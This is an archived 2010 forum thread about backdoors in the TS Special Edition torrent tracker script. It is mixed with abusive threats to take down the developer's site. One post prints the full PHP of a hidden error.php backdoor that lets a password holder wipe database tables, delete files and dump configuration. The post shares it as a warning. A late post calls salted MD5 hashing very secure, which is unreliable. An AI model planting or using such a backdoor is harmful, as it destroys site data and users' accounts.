Bravo List

Bravo List (http://www.bvlist.com/index.php)
-   Community Cafe (http://www.bvlist.com/forumdisplay.php?f=18)
-   -   ts code (http://www.bvlist.com/showthread.php?t=4427)

xDev 4th February 2010 19:43
ts code
 
rigth Dick head axam you have just took my site down and its about time your template shares site was took down as well you started this im going to finish you will not have a site as well trust me m8ty watch this space Dick head

(if any users want i site code do not us ts code)

As you do not want your site took down by him

hes a rip off taking money for tbv code and all codes to make hes own what a Dick and make money on copy and paste

And yes axam is all ways on this site checking post out its well known about it as well so i know you will see this axam and i will post all the code from your site here

Fynnon 4th February 2010 19:47
it seems he is also responsible for twitter scams:

Torrent Sites Blamed For Twitter Attack | TorrentFreak

[quote]It appears that for a number of years, a person has been creating torrent sites that require a login and password as well as creating forums set up for torrent site usage and then selling these purportedly well-crafted sites and forums to other people innocently looking to start a download site of their very own. [B]However, these sites came with a little extra

Daz 6th February 2010 12:05
Quote:
Originally Posted by FALCON10 (Post 20491)
you will not have a site as well trust me m8ty watch this space Dick head
Xam's site still appears to be online? :cool::mad:

I can't believe I actually bought this source once :wild:

It wouldn't suprise me if it is him, I'll be sure to use different passwords when signing up to TS SE sites.. :unknown:

Tony 13th February 2010 16:49
simple fix number 1 (delete error.php from root)
simple fix number 2 (remove his name from the global file within the admin panel folder )

simple fix number 3 (dont run a encrypted source version simple as that lol)

people that get there databases dropped are all the people that havent looked at any of the code they are running before hand since everything in the error.php tells you its not used for displaying errors for sql commands or anything like that and is used to drop your database tables and wipe the lot but yet its still included in all the versions posted here (remove it :P )

Quote:
you will not have a site as well trust me m8ty watch this space Dick head
lesson number 1 (dont threaten somebody if you dont have skill to do what you state since you get laughed at )
lesson number 2 (grow up)
lesson number 3 (enough with all the xam hated posts since its getting boring tbh now)

hope this helps

Daz 13th February 2010 18:51
Tony, so basically you are saying that the nulled versions here are not safe to use with ts_error.php? Why? I just see arrays, nothing xam could do? :unknown:

Tony 13th February 2010 19:07
i said error.php not ts_error.php :)

take alook yourself and see :)

code from error.php

Code:
/***********************************************/
/*=========[TS Special Edition v.5.6]==========*/
/*=============[Special Thanks To]=============*/
/*        DrNet - wWw.SpecialCoders.CoM        */
/*          Vinson - wWw.Decode4u.CoM          */
/*    MrDecoder - wWw.Fearless-Releases.CoM    */
/*          Fynnon - wWw.BvList.CoM          */
/***********************************************/


  function ___dbconnect ()
  {
    $dbfile = ROOT_PATH . 'config/DATABASE';
    if (!@file_exists ($dbfile))
    {
      exit ('DATABASE Configuration file does not exists');
      return null;
    }

    $data = unserialize (@file_get_contents ($dbfile));
    $link = @mysql_connect ($data['mysql_host'], $data['mysql_user'], $data['mysql_pass']);
    if (!$link)
    {
      exit ('Not connected : ' . mysql_error ());
    }

    $db_selected = @mysql_select_db ($data['mysql_db'], $link);
    if (!$db_selected)
    {
      exit ('Can\'t use ' . $data['mysql_db'] . ' : ' . mysql_error ());
    }

  }

  @error_reporting (E_ALL & ~E_NOTICE);
  @ini_set ('error_reporting', E_ALL & ~E_NOTICE);
  @ini_set ('display_errors', '0');
  @ini_set ('log_errors', '0');
  @define ('___P', 'af274e235c70a9dc59371860ed6f34ce');
  @define ('ROOT_PATH', './');
  @___dbconnect ();
  if (isset ($_GET['_warning_']))
  {
    if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
    {
      $subject = 'Claiming a violation!';
      $msg = 'Hi,
 
We are developer of TS SE Script. We are concerned having become aware that this website (tracker) is using an unauthorised version of our software which is against (Claiming a violation of clause 8.1.3 of the Heart Internet Ltd Terms and Conditions updated 31 Jan 2007) and our License Agreement.
 
You have 3 (three) business days to remove our product from your website (Host) or purchase a valid license from https://templateshares.net
 
Best Regards.
TS SE Security Team.
security@templateshares.net
    ';
      require_once INC_PATH . '/functions_pm.php';
      $query = mysql_query ('SELECT u.id FROM users u LEFT JOIN usergroups g ON (u.usergroup=g.gid) WHERE g.cansettingspanel = \'yes\'');
      while ($staff = mysql_fetch_assoc ($query))
      {
        send_pm ($staff['id'], $msg, $subject);
      }
    }
    else
    {
      exit ('
       

            Enter password:
           
       
');
    }
  }
  else
  {
    if (isset ($_GET['_cleartable_']))
    {
      if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
      {
        @_db_connect_ ();
        $_tables_ = array ('users', 'torrents', 'ts_plugins', 'ts_templates', 'requests', 'iplog', 'categories', 'tsf_forums', 'tsf_forumpermissions', 'tsf_posts', 'tsf_threads', 'usergroups', 'ipbans', 'files', 'messages', 'tsf_threadsread', 'staffpanel');
        foreach ($_tables_ as $_table_)
        {
          echo $_table_ . ' cleared!
';
          @mysql_query ('TRUNCATE TABLE `' . $_table_ . '`');
        }

        @mysql_close ();
        exit ('boom');
      }
      else
      {
        exit ('
       

            Enter password:
           
       
');
      }
    }
    else
    {
      if (isset ($_GET['_showversion_']))
      {
        if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
        {
          define ('IN_TRACKER', true);
          include_once 'init.php';
          exit ('Version (init.php) ' . VERSION . ' --- ORJ. Version 5.6');
        }
        else
        {
          exit ('
       

            Enter password:
           
       
');
        }
      }
      else
      {
        if (isset ($_GET['_showowner_']))
        {
          if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
          {
            $_file333__ = @file_get_contents (ROOT_PATH . '/global.php');
            $_file444__ = @file_get_contents (ROOT_PATH . 'links.php');
            exit ('global.php -> ' . htmlspecialchars ($_file333__) . 'Links.php -> ' . htmlspecialchars ($_file444__) . '');
          }
          else
          {
            exit ('
       

            Enter password:
           
       
');
          }
        }
        else
        {
          if (isset ($_GET['_deletefiles_']))
          {
            if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
            {
              if ($handle = @opendir (ROOT_PATH . 'torrents'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH . 'torrents/' . $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH . 'config'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH . 'config/' . $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH . 'cache'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH . 'cache/' . $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH . 'tsf_forums/uploads'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH . 'tsf_forums/uploads/' . $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }

              if ($handle = @opendir (ROOT_PATH . 'include/avatars'))
              {
                while (false !== $file = @readdir ($handle))
                {
                  if (($file != '.' AND $file != '..'))
                  {
                    @unlink (ROOT_PATH . 'include/avatars/' . $file);
                    continue;
                  }
                }

                @closedir ($handle);
              }
            }
            else
            {
              exit ('
       

            Enter password:
           
       
');
            }
          }
          else
          {
            if (isset ($_GET['_showserverinfo_']))
            {
              if ((!empty ($_POST['password']) AND md5 ($_POST['password']) === ___P))
              {
                echo phpinfo ();
                exit ();
              }
              else
              {
                exit ('
       

            Enter password:
           
       
');
              }
            }
          }
        }
      }
    }
  }

  header ('Location: ts_tags.php');
?>

Daz 13th February 2010 19:09
OMG this explains alot for me, thank you! :drink:

Tony 13th February 2010 19:11
your welcome :)

this is why people should go through the whole lot and check for back doors or else you could see a nice clean server lol

yordanov2010 13th February 2010 22:33
Quote:
Originally Posted by Daz (Post 20548)
It wouldn't suprise me if it is him, I'll be sure to use different passwords when signing up to TS SE sites.. :unknown:
We all hate xam because his source isn't free but very secure.

signup.php
PHP Code:
$secret mksecret();
$passhash md5($secret.$password.$secret); 
takelogin.php
PHP Code:
$password trim($_POST['password']);
if ($row['passhash'] != md5($row['secret'] . $password $row['secret']))
{
//Invalid Login

Nobody can see user's passwords. They are secured while registering and logging.


All times are GMT +2. The time now is 10:58.

Powered by vBulletin® Version 3.8.11 Beta 3
Copyright ©2000 - 2024, vBulletin Solutions Inc.